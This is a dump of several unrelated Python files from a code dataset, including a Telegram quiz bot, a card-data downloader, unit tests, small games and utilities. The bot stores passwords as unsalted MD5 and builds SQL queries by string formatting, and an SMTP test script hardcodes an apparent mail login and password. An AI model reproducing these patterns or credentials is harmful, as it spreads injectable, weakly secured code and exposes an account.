True)","sub_path":"Huawei_Python/SDK_python/CodeCraft-2019/src/SettingData.py","file_name":"SettingData.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"499835970","text":"# Разумеется, возможностей у бота гораздо больше.\n# Модерить чат, выдавать промо-коды, новые стикеры, обмениваться контактами и локациями и т.д.\n# В рамках тестового кейса это не реализовано, но потенциально возможно в течение короткого време��и\n\nimport work_with_DB\nimport config\nimport hashlib\nimport random\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot(token=config.token)\n\n# Custom Keyboards\nRegisterMarkup = types.ReplyKeyboardMarkup()\nRegisterMarkup.row('Зарегистрироваться')\n\nhide = types.ReplyKeyboardRemove()\n\nMainMarkup = types.ReplyKeyboardMarkup()\nMainMarkup.row('Скинуть картиночку', 'Обработать картиночку')\nMainMarkup.row('Скинуть песню', 'Послушать голосовое', 'Сделать рассылку')\nMainMarkup.row('Сыграть', 'Добавить вопрос')\n\n# BotHandlers\n\n# Registration functions\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n bot.send_message(message.chat.id, \"Отлично! 
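# Every loader in the SettingData record above parses lines shaped like
# "(v1, v2, ...)" by slicing off the parentheses and splitting on commas.
# That step extracted into a single helper, with a made-up sample line:
def parse_record(line):
    return [int(field.strip()) for field in line.strip()[1:-1].split(',')]

print(parse_record('(1001, 2, 3)\n'))  # [1001, 2, 3]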
Давай начнем\\n\"\n \"Нажми на кнопку 'Зарегистрироваться' для регистрации в боте\",\n reply_markup=RegisterMarkup)\n bot.register_next_step_handler(message, register)\n\n\ndef register(message):\n if message.text == 'Зарегистрироваться' or message.text == 'зарегистрироваться':\n bot.send_message(message.chat.id, \"Молодец!\\n\"\n \"Теперь введи свой уникальный логин\",\n reply_markup=hide)\n bot.register_next_step_handler(message, login)\n else:\n bot.send_message(message.chat.id, \"Извини, но я тебя не понимаю(( Попробуй еще раз\")\n bot.register_next_step_handler(message, register)\n\n\ndef login(message):\n try:\n all_users = work_with_DB.select(\"SELECT Login FROM users\")\n flag = False\n for i in all_users:\n if i[0] == message.text:\n flag = True\n break\n if not flag:\n bot.send_message(message.chat.id, \"Супер! Теперь придумай пароль!\")\n bot.register_next_step_handler(message, password, message.text)\n else:\n bot.send_message(message.chat.id, \"Извини, но этот логин уже занят(( Попробуй еще раз\")\n bot.register_next_step_handler(message, login)\n except:\n print(\"Troubles with DB in func 'login'\")\n\n\n# Save password in DB as hash\ndef password(message, login):\n if len(message.text) > 4:\n try:\n pwd = message.text\n salt = hashlib.md5(pwd.encode())\n work_with_DB.register(login, salt.hexdigest(), message.chat.id)\n bot.send_message(message.chat.id, \"Готово! Теперь ты можешь пользоваться ботом\", reply_markup=MainMarkup)\n except:\n print(\"Trouble with DB if func 'password'\")\n else:\n bot.send_message(message.chat.id, \"Слишком короткий пароль(( Попробуй еще\")\n bot.register_next_step_handler(message, password, login)\n\n\n# Возможности бота:\n# ToDo Сделать проверку авторизации\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n bot.send_message(message.chat.id, \"Вот, что я умею:\\n\"\n \"/img - скинуть картиночку\\n\"\n \"/filter_img - обработаю твою картиночку\\n\"\n \"/music - скину песню\\n\"\n \"/voice - прослушаю твое голосовое\\n\"\n \"/quiz - сыграем с тобой в викторину\\n\"\n \"/add_quiz - добавит мини-quiz\\n\"\n \"/send_all - сделаю рассылку всем авторизованным пользователям\")\n\n\n@bot.message_handler(commands=[\"img\", \"filter_img\", \"music\", \"voice\", \"quiz\", \"add_quiz\", \"send_all\"])\ndef Distributor(message):\n mes = message.text[1:]\n if mes == 'img':\n send_img(message)\n elif mes == 'filter_img':\n filter_img(message)\n elif mes == 'music':\n music(message)\n elif mes == 'voice':\n voice(message)\n elif mes == 'send_all':\n send_all(message)\n elif mes == 'quiz':\n quiz(message)\n elif mes == 'add_quiz':\n add_quiz(message)\n\n\ndef send_img(message):\n bot.send_photo(message.chat.id, 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Papirus-64-apps-icq.svg/1200px-Papirus-64-apps-icq.svg.png')\n\n\ndef filter_img(message):\n bot.send_message(message.chat.id, 'Отправь ссылку на фотографию для обработки')\n bot.register_next_step_handler(message, filter_img_request)\n\n\ndef filter_img_request(message):\n bot.send_message(message.chat.id, 'if I am allowed to use API, I will send you a filtered photo')\n try:\n bot.send_photo(message.chat.id, message.text)\n except:\n print('message.text != photo_url')\n\n\ndef music(message):\n bot.send_audio(message.chat.id, 'http://d.zaix.ru/ic9z.mp3')\n\n\ndef voice(message):\n bot.send_message(message.chat.id, 'Скинь голосовое сообщение')\n bot.register_next_step_handler(message, voice_request)\n\n\ndef voice_request(message):\n bot.send_message(message.chat.id, 'Я тебя 
услышал')\n\n\ndef send_all(message):\n try:\n all_users = work_with_DB.select(\"SELECT TelegramID FROM users\")\n users_send = []\n for i in all_users:\n if i[0] not in users_send:\n bot.send_message(i[0], 'Рассылка')\n users_send.append(i[0])\n except:\n print('Mailing errors')\n\n\ndef quiz(message):\n try:\n all_quiz = work_with_DB.select(\"SELECT * FROM quiz\")\n rand = random.randint(0, len(all_quiz) -1)\n bot.send_message(message.chat.id, 'Вот твой вопрос:\\n\"'\n + all_quiz[rand][0] +\n '\"\\nТеперь жду ответ')\n bot.register_next_step_handler(message, answer_quiz, all_quiz[rand][0])\n except:\n print('Troubles in quiz')\n\n\ndef answer_quiz(message, question):\n try:\n answer = work_with_DB.select(\"SELECT Answer FROM `quiz` WHERE `Question` = {}\".format(\"'\" + str(question) + \"'\"))\n if message.text == answer[0]:\n bot.send_message(message.chat.id, 'Congratulations')\n else:\n bot.send_message(message.chat.id, 'Попробуй еще раз')\n bot.register_next_step_handler(message, answer_quiz)\n except:\n print('Trouble in answer_quiz')\n\n\ndef add_quiz(message):\n bot.send_message(message.chat.id, 'Введи вопрос')\n bot.register_next_step_handler(message, set_question)\n\n\ndef set_question(message):\n question = message.text\n bot.send_message(message.chat.id, 'Отлчино, теперь ответ')\n bot.register_next_step_handler(message, set_answer, question)\n\n\ndef set_answer(message, question):\n try:\n work_with_DB.new_quiz(question, message.text)\n bot.send_message(message.chat.id, 'Успех!')\n except:\n print('Trouble in set_answer')\n\n\n# Distributor\n@bot.message_handler(content_types=[\"text\"])\ndef distributor(message):\n mes = message.text\n if mes == 'Скинуть картиночку':\n send_img(message)\n elif mes == 'Обработать картиночку':\n filter_img(message)\n elif mes == 'Скинуть песню':\n music(message)\n elif mes == 'Послушать голосовое':\n voice(message)\n elif mes == 'Сделать рассылку':\n send_all(message)\n elif mes == 'Сыграть':\n quiz(message)\n elif mes == 'Добавить вопрос':\n add_quiz(message)\n\n\nbot.polling(none_stop=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"600196001","text":"\"\"\"Download required remote files.\"\"\"\n\nimport codecs\nimport collections\nimport json\nimport os\nimport zipfile\n\nimport requests\nimport requests.exceptions\n\nMTGJSON_ADDRESS = \"http://mtgjson.com/json/\"\nVERSION_FILENAME = \"version-full.json\"\nALLSETS_FILENAME = \"AllSets.json.zip\"\n\n\nclass Error(Exception):\n \"\"\"Base error class for this module.\"\"\"\n\n\nclass DownloadError(Error):\n \"\"\"Raised if the downloader fails to fetch a file.\"\"\"\n\n\ndef fetch_mtgjson(data_path):\n \"\"\"Check version and fetch (if needed) mtgjson file to data_path.\"\"\"\n if not os.path.exists(data_path):\n os.makedirs(data_path)\n elif not os.path.isdir(data_path):\n raise DownloadError(\"data_path: %s must be a folder\" % data_path)\n\n allsets_filename = os.path.join(data_path, ALLSETS_FILENAME)\n version_filename = os.path.join(data_path, VERSION_FILENAME)\n if os.path.exists(allsets_filename) and os.path.exists(version_filename):\n with open(version_filename, \"r\") as version_file:\n local_version_data = json.load(version_file)\n local_version = tuple(\n int(v) for v in local_version_data[\"version\"].split(\".\")\n )\n else:\n local_version = (0, 0, 0)\n\n try:\n print(\"Checking remote vs local version of mtgjson data.\")\n ver_req = 
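# The registration flow above stores hashlib.md5(pwd).hexdigest() -- the local
# variable is named `salt`, but no salt is actually involved. A safer sketch
# using a real random salt and the stdlib's deliberately slow PBKDF2:
import hashlib
import os

def hash_password(password):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100_000)
    return salt, digest

def verify(password, salt, digest):
    return hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100_000) == digest

salt, digest = hash_password('s3cret')   # illustrative password only
print(verify('s3cret', salt, digest))    # True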
requests.get(MTGJSON_ADDRESS + VERSION_FILENAME)\n ver_req.raise_for_status()\n\n remote_version_data = ver_req.json()\n remote_version = tuple(\n int(v) for v in remote_version_data[\"version\"].split(\".\")\n )\n\n if local_version >= remote_version:\n print(\"Mtgjson data is already up to date.\")\n return False\n\n print(\"Downloading mtgjson data.\")\n mtg_req = requests.get(MTGJSON_ADDRESS + ALLSETS_FILENAME)\n mtg_req.raise_for_status()\n with open(allsets_filename, \"wb\") as allsets_file:\n allsets_file.write(mtg_req.content)\n with open(version_filename, \"wb\") as version_file:\n version_file.write(ver_req.content)\n return True\n except requests.ConnectionError as err:\n raise DownloadError(\"Could not connect to mtgjson\") from err\n except requests.exceptions.HTTPError as err:\n raise DownloadError(\"Could not retrieve mtgjson data\") from err\n\n\ndef read_mtgjson(data_path):\n \"\"\"Read data from mtgjson file and return loaded contents.\"\"\"\n allsets_filename = os.path.join(data_path, ALLSETS_FILENAME)\n with zipfile.ZipFile(allsets_filename, \"r\") as allsets_zipfile:\n [datafilename] = allsets_zipfile.namelist()\n datafile = allsets_zipfile.open(datafilename)\n reader = codecs.getreader(\"utf-8\")\n mtgdata = json.load(reader(datafile), object_pairs_hook=collections.OrderedDict)\n return mtgdata\n","sub_path":"mtg_ssm/mtgjson.py","file_name":"mtgjson.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"280054304","text":"# Copyright 2013 - Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
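# The mtgjson updater above compares dotted versions as integer tuples, which
# avoids the classic string-comparison trap. The trick in isolation:
def as_tuple(version):
    return tuple(int(part) for part in version.split('.'))

print('0.10.0' > '0.9.9')                      # False -- strings mislead
print(as_tuple('0.10.0') > as_tuple('0.9.9'))  # True  -- tuples compare numerically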
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nimport testscenarios\n\nfrom solum.api.controllers.v1.datamodel import sensor as model\nfrom solum.api.controllers.v1 import sensor as controller\nfrom solum.tests import base\nfrom solum.tests import fakes\n\n\nload_tests = testscenarios.load_tests_apply_scenarios\n\n\nclass TestSensorValueTypeGood(base.BaseTestCase):\n\n scenarios = [\n ('int_str', dict(\n in_value=3, in_type='str', out_value='3')),\n ('int_int', dict(\n in_value=3, in_type='int', out_value=3)),\n ('str_int', dict(\n in_value='3', in_type='int', out_value=3)),\n ('float_str', dict(\n in_value=3.4, in_type='str', out_value='3.4')),\n ('str_float', dict(\n in_value='2.45', in_type='float', out_value=2.45)),\n ('float_float', dict(\n in_value=2.45, in_type='float', out_value=2.45)),\n ]\n\n def test_values(self):\n s = model.Sensor(sensor_type=self.in_type, value=self.in_value)\n self.assertEqual(self.out_value, s.value)\n\n\nclass TestSensorValueTypeBad(base.BaseTestCase):\n\n scenarios = [\n ('sp_int', dict(\n in_value=3.2, in_type='int')),\n ('bp_int', dict(\n in_value=3.7, in_type='int')),\n ('sn_int', dict(\n in_value=-3.1, in_type='int')),\n ('bn_int', dict(\n in_value=-3.9, in_type='int')),\n ('float', dict(\n in_value='sunny', in_type='float')),\n ]\n\n def test_values(self):\n s = model.Sensor(sensor_type=self.in_type, value=self.in_value)\n self.assertRaises(ValueError, getattr, s, 'value')\n\n\n@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)\n@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)\nclass TestSensorController(base.BaseTestCase):\n def test_sensor_get(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n sensor_model = obj.get()\n self.assertEqual(200, resp_mock.status)\n self.assertIsNotNone(sensor_model)\n\n def test_sensor_put(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n obj.put(None)\n self.assertEqual(400, resp_mock.status)\n\n def test_sensor_delete(self, resp_mock, request_mock):\n obj = controller.SensorController('test_id')\n obj.delete()\n self.assertEqual(400, resp_mock.status)\n\n\n@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)\n@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)\nclass TestSensorsController(base.BaseTestCase):\n def test_sensors_get_all(self, resp_mock, request_mock):\n sensor_obj = controller.SensorsController()\n resp = sensor_obj.get_all()\n self.assertIsNotNone(resp)\n self.assertEqual(200, resp_mock.status)\n\n def test_sensors_post(self, resp_mock, request_mock):\n obj = controller.SensorsController()\n obj.post(None)\n self.assertEqual(400, resp_mock.status)\n","sub_path":"solum/tests/api/v1/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"150425005","text":"import os\nimport shutil\nimport csv\nfrom os.path import isfile, join\nimport glob\nimport numpy\n\n# Get current path.\nmypath = os.getcwd()\n\n\ndef create_spreadsheet():\n folders = img_folder_list()\n folders.sort()\n folder_list = []\n header = []\n for folder in folders:\n folder_list.append([folder+\"/\"+f for f in os.listdir(mypath+'/'+folder) if f.endswith(\".jpg\") or f.endswith(\".jpeg\")])\n \n for i in range(img_folder_count()):\n header.append(\"Image\"+str(i+1))\n \n transposed_list = 
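# The tests above rely on testscenarios to fan one test method out across the
# `scenarios` list. The same data-driven shape with only the stdlib, via
# unittest subtests -- an equivalent sketch, not the project's own helper:
import unittest

class TestValueCasts(unittest.TestCase):
    scenarios = [('int_str', 3, str, '3'), ('str_int', '3', int, 3)]

    def test_values(self):
        for name, value, cast, expected in self.scenarios:
            with self.subTest(name):
                self.assertEqual(expected, cast(value))

if __name__ == '__main__':
    unittest.main()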
numpy.transpose(folder_list)\n\n #this works but is hardcoded solution\n with open('variables.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for row in transposed_list:\n writer.writerow(row)\n print(\"[ALERT] Row Created.\")\n\n print(\"[INFO] Spreadsheet Created.\")\n\n menu()\n\ndef reset_image_folders():\n # Make list of all image directories.\n reset_folders = glob.glob('img*') + glob.glob('output') + glob.glob('temp') + glob.glob('psd')\n for item in reset_folders:\n if os.path.isdir(item):\n shutil.rmtree(item)\n print(\"[ALERT] /\"+item+\" deleted.\")\n\n else:\n print(\"[ALERT] /\"+item+\" not found.\")\n print(\"[INFO] All folders reset.\")\n menu()\n\ndef img_folder_count():\n # Counts number of image folders.\n return len(img_folder_list())\n\ndef img_folder_list():\n return glob.glob('img*')\n\ndef create_image_directories(img_count):\n # Create directories for each image.\n try:\n for i in range(img_count):\n os.mkdir(mypath+'/img'+str(i+1))\n os.mkdir(mypath+'/psd')\n os.mkdir(mypath+'/temp')\n os.mkdir(mypath+'/output')\n print(\"[INFO] Image directories created.\")\n print(\"[INFO] Utility directories created.\")\n menu()\n except:\n print(\"[ERROR] Image directories already exist.\")\n menu()\n\ndef menu():\n\n print(\"\\nPS Batch Export Script\")\n print(\"1)Create CSV \\n2)Reset Program \\n3)Create Directories \\n4)Exit\")\n user = input()\n try:\n if user == \"1\":\n create_spreadsheet()\n elif user == \"2\":\n print(\"[ALERT] DOING THIS WILL DELETE ALL IMG FOLDERS AND THEIR CONTENTS!\")\n reset_program = input(\"Are you sure you want to reset the program? (y/n)\")\n if reset_program == \"y\" or reset_program == \"Y\":\n reset_image_folders()\n else:\n print(\"[INFO] Reset Aborted.\")\n menu()\n elif user == \"3\":\n img_count = input(\"How many image folders do you want to create? 
\")\n create_image_directories(int(img_count))\n elif user == \"4\":\n print(\"[INFO] Program terminated.\")\n exit()\n\n except:\n print(\"[WARNING] Something went wrong.\")\n menu()\n\nmenu()\n","sub_path":"PhotoshopExportScript.py","file_name":"PhotoshopExportScript.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"259123529","text":"import config\nfrom getch import *\nfrom displaySetup import *\n\nimport time, os, sys, random\n\n# class definition of player\nclass Player:\n def __init__(self, screenHeight, floorsize):\n self.simplePlayer = 'm'\n self.powerPlayer = 'M'\n self.playerWidth = 2\n self.playerHeight = 2\n self.playerX = screenHeight - floorsize\n self.playerY = 1\n self.isjump = False\n self.score = 0\n self.lives = 3\n \n # clear initial position\n def clearpos(self):\n for i in range(self.playerHeight):\n for j in range(self.playerWidth):\n display[self.playerX - i][self.playerY + j] = ' '\n \n def pifall(self):\n if self.playerX == screenHeight:\n self.lives -= 1\n self.score = 0\n config.leftY = 0\n config.rightY = screenWidth + 1\n self.clearpos()\n self.playerX = base\n self.playerY = 1\n \n def setplayer(self, display):\n for i in range(2):\n for j in range(2):\n display[self.playerX - i][self.playerY + j] = self.simplePlayer\n \n # checking whether gravity acts\n def checkGravity(self):\n while (display[self.playerX + 1][self.playerY] == ' ') and (display[self.playerX + 1][self.playerY + 1] == ' '):\n self.clearpos()\n self.playerX += 1\n os.system(\"clear\")\n self.setplayer(display)\n self.setplayer(display)\n printgame()\n time.sleep(0.020)\n\n\n #right movement\n def moveright(self):\n if display[self.playerX][self.playerY + 2] != ' ' or display[self.playerX - 1][self.playerY + 2] != ' ':\n return\n self.clearpos()\n self.playerY += 1\n if self.playerY >= screenWidth // 2 and config.rightY < totalWidth:\n config.leftY += 1\n config.rightY += 1\n\n #left movement\n def moveleft(self):\n if self.playerY == 0:\n return\n if display[self.playerX][self.playerY - 1] != ' ' or display[self.playerX - 1][self.playerY - 1] != ' ':\n return\n self.clearpos()\n self.playerY -= 1\n if config.leftY > 0:\n config.leftY -= 1\n config.rightY -= 1\n\n \n #checking for upper obstacle\n def upObs(self):\n for i in range(self.playerWidth):\n try:\n if display[self.playerX - 2][self.playerY + i] != ' ':\n return True\n except:\n return True\n return False\n \n #up movement\n def moveup(self):\n global simMove\n self.isjump = True\n for i in range(maxjump):\n if self.upObs():\n break\n self.clearpos()\n self.playerX -= 1\n if self.isjump:\n keypress = get_input()\n if self.upObs():\n break\n self.isjump = False\n simMove -= 1\n \n ## simultaneous movement\n if simMove:\n simMove -= 1\n if keypress == 'a':\n self.moveleft()\n elif keypress == 'd':\n self.moveright()\n time.sleep(0.100)\n os.system(\"clear\")\n self.setplayer(display)\n printgame()\n self.isjump = False\n self.checkGravity()\n\n # generalized movement of the player\n def movement(self):\n keypress = getch()\n if keypress == 'q':\n return keypress\n elif keypress == 'a':\n self.moveleft()\n elif keypress == 'd':\n self.moveright()\n elif keypress == 'w':\n self.moveup()\n return keypress\n","sub_path":"playerClass.py","file_name":"playerClass.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"572872796","text":"from 
email.header import Header\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nsender = 'd1452823030@163.com'\nreceiver = 'd1452823030@163.com'\nmessage = MIMEText(_text='这是内容', _charset='utf8')\nmessage['From'] = Header(sender, 'utf8')\nmessage['To'] = Header(receiver, 'utf8')\nmessage['Subject'] = Header('测试邮件', 'utf8')\nsmtp = SMTP()\nsmtp.connect('smtp.163.com')\nsmtp.login('d1452823030', 'zxcv123456')\nsmtp.sendmail(sender, receiver, message.as_string())\n","sub_path":"smtp_test.py","file_name":"smtp_test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"401497540","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nn = int(input())\n\n\n# In[9]:\n\n\ndef func(s):\n if int(s) > n:\n return 0\n \n ret = 1 if all(s.count(c) > 0 for c in '753') else 0\n for c in \"753\":\n ret += func(s + c)\n return ret\n\nprint(func(\"0\"))\n\n","sub_path":"ABC114/C/C_main.py","file_name":"C_main.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157806417","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rdp import rdp\n\n# polyline coordinates\ncoord = [[30, -245], [61, -186], [80, -134], [125, -129], [153, -165], [173, -199],\n [224, -212], [268, -178], [286, -137], [319, -132], [352, -158], [371, -155],\n [399, -156], [419, -188], [445, -207], [460, -194], [472, -200], [489, -185],\n [480, -138], [465, -87], [477, -44], [501, -41], [544, -81], [570, -118]]\n\n# implementation of the Ramer-Douglas-Peucker algorithm: https://pypi.python.org/pypi/rdp\nres100 = rdp(coord, epsilon=100)\nres50 = rdp(coord, epsilon=50)\nres25 = rdp(coord, epsilon=25)\nres10 = rdp(coord, epsilon=10)\n\n# convert python array to numpy-stype array\nnp_coord = np.asarray(coord)\nnp_res100 = np.asarray(res100)\nnp_res50 = np.asarray(res50)\nnp_res25 = np.asarray(res25)\nnp_res10 = np.asarray(res10)\n\n# plot polylines\nplt.plot(np_coord[:,0], np_coord[:,1], \"ko-\")\nplt.plot(np_res100[:,0], np_res100[:,1], \"bx-\")\nplt.plot(np_res50[:,0], np_res50[:,1], \"cx-\")\nplt.plot(np_res25[:,0], np_res25[:,1], \"gx-\")\nplt.plot(np_res10[:,0], np_res10[:,1], \"mx-\")\n# plot tolerance values\nplt.plot([-50, -50], [-245, -145], \"bx-\")\nplt.plot([-30, -30], [-245, -195], \"cx-\")\nplt.plot([-10, -10], [-245, -220], \"gx-\")\nplt.plot([10, 10], [-245, -235], \"mx-\")\n\nplt.axis(\"equal\")\nplt.title(\"Python implementation of the Ramer-Douglas-Peucker algorithm\\n (https://pypi.python.org/pypi/rdp)\")\nplt.text(-70, -160, \"Tolerance Value\", rotation = 90)\nplot = plt.gca()\nplot.axes.get_xaxis().set_visible(False)\nplot.axes.get_yaxis().set_visible(False)\nplt.show()","sub_path":"visualization/douglasPeucker.py","file_name":"douglasPeucker.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"607239257","text":"import random\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass Sum:\n def __init__(self, carry, sumlist):\n self.carry = carry\n self.sumlist = sumlist\n\ndef add_rev(a, b, carry):\n if carry == 0:\n if a is None and b is None:\n return None\n\n if a is None:\n return b\n\n if b is None:\n return a\n\n if a is None:\n a = Node(0)\n if b is None:\n b = Node(0)\n \n calc = a.val + b.val + carry\n val = calc % 10\n carry = int(calc / 10)\n cur 
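# The ABC114 record above grows digit strings from "0" and prunes once the
# value exceeds n; int() ignores the leading zero, so the count is unaffected.
# An iterative equivalent for comparison (same counting rule, as read from the code):
from itertools import product

def count_753(n):
    total = 0
    for length in range(3, len(str(n)) + 1):
        for digits in product('753', repeat=length):
            if int(''.join(digits)) <= n and {'7', '5', '3'} <= set(digits):
                total += 1
    return total

print(count_753(575))  # 4: 357, 375, 537, 573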
= Node(val)\n cur.next = add_rev(a.next, b.next, carry)\n return cur\n\ndef gen_int_llist(num):\n head = Node(random.randint(0, 9))\n prev = head\n for i in range(0, num):\n cur = Node(random.randint(0, 9))\n prev.next = cur\n prev = cur\n\n return head\n\ndef dump_num_rev(num_llist_rev):\n stack = []\n cur = num_llist_rev\n while cur is not None:\n stack.append(cur.val)\n cur = cur.next\n\n val = ''\n while len(stack) > 0:\n val += str(stack.pop())\n\n return val\n\ndef dump_num(num_llist):\n cur = num_llist\n val = ''\n while cur is not None:\n val += str(cur.val)\n cur = cur.next\n\n return val\n\ndef adjust_digit(a, b):\n a_nlen = b_nlen = 0\n\n cur = a\n while cur is not None:\n cur = cur.next\n a_nlen += 1\n cur = b\n while cur is not None:\n cur = cur.next\n b_nlen += 1\n\n ndigit = max(a_nlen, b_nlen)\n \n a_new = a\n if a_nlen != ndigit: \n head = Node(0)\n prev = head\n for i in range(a_nlen+1, ndigit):\n cur = Node(0)\n prev.next = cur\n prev = cur\n prev.next = a_new\n a_new = prev\n\n b_new = b\n if b_nlen != ndigit: \n head = Node(0)\n prev = head\n for i in range(b_nlen+1, ndigit):\n cur = Node(0)\n prev.next = cur\n prev = cur\n prev.next = b_new\n b_new = head\n \n return (a_new, b_new)\n\ndef sum_sub(a, b):\n if a is None and b is None:\n return Sum(0, None)\n\n sub_sum = sum_sub(a.next, b.next)\n sum_total = a.val + b.val + sub_sum.carry \n sum_val = Node(sum_total % 10)\n sum_carry = int(sum_total / 10)\n sum_val.next = sub_sum.sumlist\n \n return Sum(sum_carry, sum_val)\n\ndef add(a, b, carry):\n a, b = adjust_digit(a, b)\n\n #print(dump_num(a))\n #print(dump_num(b))\n\n total_sum = sum_sub(a, b)\n total_head = total_sum.sumlist\n if total_sum.carry > 0:\n carry_node = Node(1)\n carry_node.next = total_head\n total_head = carry_node\n\n return total_head \n\ndef doit():\n tests = [\n (gen_int_llist(10), gen_int_llist(10)),\n (gen_int_llist(10), gen_int_llist(8)),\n (gen_int_llist(10), gen_int_llist(1)),\n ]\n for t in tests:\n print('adding {} and {}'.format(\n dump_num(t[0]), dump_num(t[1])))\n print(dump_num(add(t[0], t[1], 0)))\n \ndef doit_rev():\n tests = [\n (gen_int_llist(10), gen_int_llist(10)),\n (gen_int_llist(10), gen_int_llist(8)),\n (gen_int_llist(10), gen_int_llist(1)),\n ]\n for t in tests:\n print('adding {} and {}'.format(\n dump_num_rev(t[0]), dump_num_rev(t[1])))\n print(dump_num_rev(add_rev(t[0], t[1], 0)))\n\nprint('--------------------')\nprint('adding two digits in first->tenth->hundredth->..')\ndoit_rev()\nprint('--------------------')\nprint('adding two digits in ..->hundredth->tenth->first')\ndoit()\n","sub_path":"2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"277444235","text":"# Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT). 
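# The forward-order adder above pads the shorter list, then recurses to carry;
# a quick sanity check is plain integer addition. Node is re-declared so this
# snippet stands alone (same shape as the record's class):
class Node:
    def __init__(self, val):
        self.val, self.next = val, None

def from_digits(digits):
    head = cur = Node(digits[0])
    for d in digits[1:]:
        cur.next = Node(d)
        cur = cur.next
    return head

def to_int(node):
    n = 0
    while node:
        n, node = n * 10 + node.val, node.next
    return n

a, b = from_digits([9, 7, 5]), from_digits([2, 8])
print(to_int(a) + to_int(b))  # 1003 -- what add(a, b, 0) should represent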
All rights reserved.\n# This software may be modified and distributed under the terms of the\n# GNU Lesser General Public License v2.1 or any later version.\n\nimport os\nimport shutil\nimport platform\nfrom setuptools.command.build_ext import build_ext\nfrom setuptools import setup, find_packages, Extension\n\n\nclass CopyMeshes(Extension):\n extension_name = \"CopyMeshes\"\n\n def __init__(self):\n Extension.__init__(self, name=self.extension_name, sources=[])\n\n\nclass BuildExtension(build_ext):\n \"\"\"\n Setuptools build extension handler.\n It processes all the extensions listed in the 'ext_modules' entry.\n \"\"\"\n\n # Name of the python package (the name used to import the module)\n PACKAGE_NAME = \"gym_ignition_models\"\n\n # Shared mesh directory\n SHARED_MESH_DIR = \"meshes\"\n\n # Dict that defines the folders to copy during the build process\n FROM_ORIG_TO_DEST = {\n f\"{SHARED_MESH_DIR}/iCubGazeboV2_5\": \"iCubGazeboV2_5/meshes\",\n f\"{SHARED_MESH_DIR}/iCubGazeboV2_5\": \"iCubGazeboSimpleCollisionsV2_5/meshes\",\n }\n\n def run(self) -> None:\n if len(self.extensions) != 1 or not isinstance(self.extensions[0], CopyMeshes):\n raise RuntimeError(\"This class can only build one CopyMeshes object\")\n\n if platform.system() != \"Linux\":\n raise RuntimeError(\"Only Linux is currently supported\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext) -> None:\n if ext.name != CopyMeshes.extension_name:\n print(f\"Skipping unsupported extension '{ext.name}'\")\n return\n\n if self.inplace:\n raise RuntimeError(\"Editable mode is not supported by this project\")\n\n # Get the temporary external build directory\n ext_dir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # Package directory\n pkg_dir = os.path.join(ext_dir, self.PACKAGE_NAME)\n\n # Check that the directory exists\n if not os.path.isdir(pkg_dir):\n raise RuntimeError(f\"The build package directory '{pkg_dir}' does not exist\")\n\n # Copy the folders\n for orig, dest in self.FROM_ORIG_TO_DEST.items():\n orig_folder = os.path.join(pkg_dir, orig)\n dest_folder = os.path.join(pkg_dir, dest)\n\n if not os.path.isdir(orig_folder):\n raise RuntimeError(f\"Folder '{orig_folder}' does not exist\")\n\n if os.path.isdir(dest_folder):\n shutil.rmtree(dest_folder)\n\n shutil.copytree(orig_folder, dest_folder)\n\n # Remove the shared mesh folder\n shutil.rmtree(os.path.join(pkg_dir, self.SHARED_MESH_DIR))\n\n\n# Read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n 